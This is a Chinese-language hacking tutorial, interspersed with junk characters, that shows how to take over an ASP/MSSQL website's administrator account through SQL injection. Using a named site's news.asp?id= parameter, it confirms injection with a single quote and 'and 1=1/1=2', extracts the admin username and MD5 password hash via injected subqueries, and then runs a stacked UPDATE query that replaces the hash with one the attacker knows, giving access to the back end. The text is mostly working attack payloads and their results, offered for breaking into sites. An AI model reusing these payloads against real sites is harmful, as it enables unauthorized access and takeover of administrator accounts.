经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。& d% `- U1 o: ?
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)8 g. Q/ W* l* d! H) }) n$ B
测试如下:, f; j u0 H4 C8 z
http://www.tmdsb.com/news.asp?id=121
$ Z7 y# ]; F6 @在地址后输入单引号,显示
& i' I/ [5 V% w& y9 WMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’( W7 j& T2 T+ Y( F
字符串 ’’’ 之前有未闭合的引号
i2 f" R% K1 [% g3 z8 N9 x) M/news/tmdws.asp,行63
; p4 D H$ S8 f4 G' y说明没有过滤单引号且数据库是MSSQL.
+ j3 E& Z ]7 r4 Cand 1=1正常。and 1=2出错。肯定存在注入
$ j# Y# S; v) |2 Z& B+ ?" O4 ]接着输入
1 w* v7 H2 O8 l3 h. ]: shttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
; m9 k0 @1 E/ L( f% n5 c( t# g得到帐号为:admin g/ O7 B5 \ V0 d6 `
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)7 m$ K9 X; b- J9 o$ K3 q: ?
得到密码为:a4716077c2ba075c/ P- i0 e' A1 k# e* b5 d! }# L3 |
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433: g2 D/ ^9 M |8 g' ^! S/ _+ N) S
命令如下 :& q' c# G' t/ e. a
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–( j0 L. b5 G% [) w- s) c" h6 {# m2 O
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |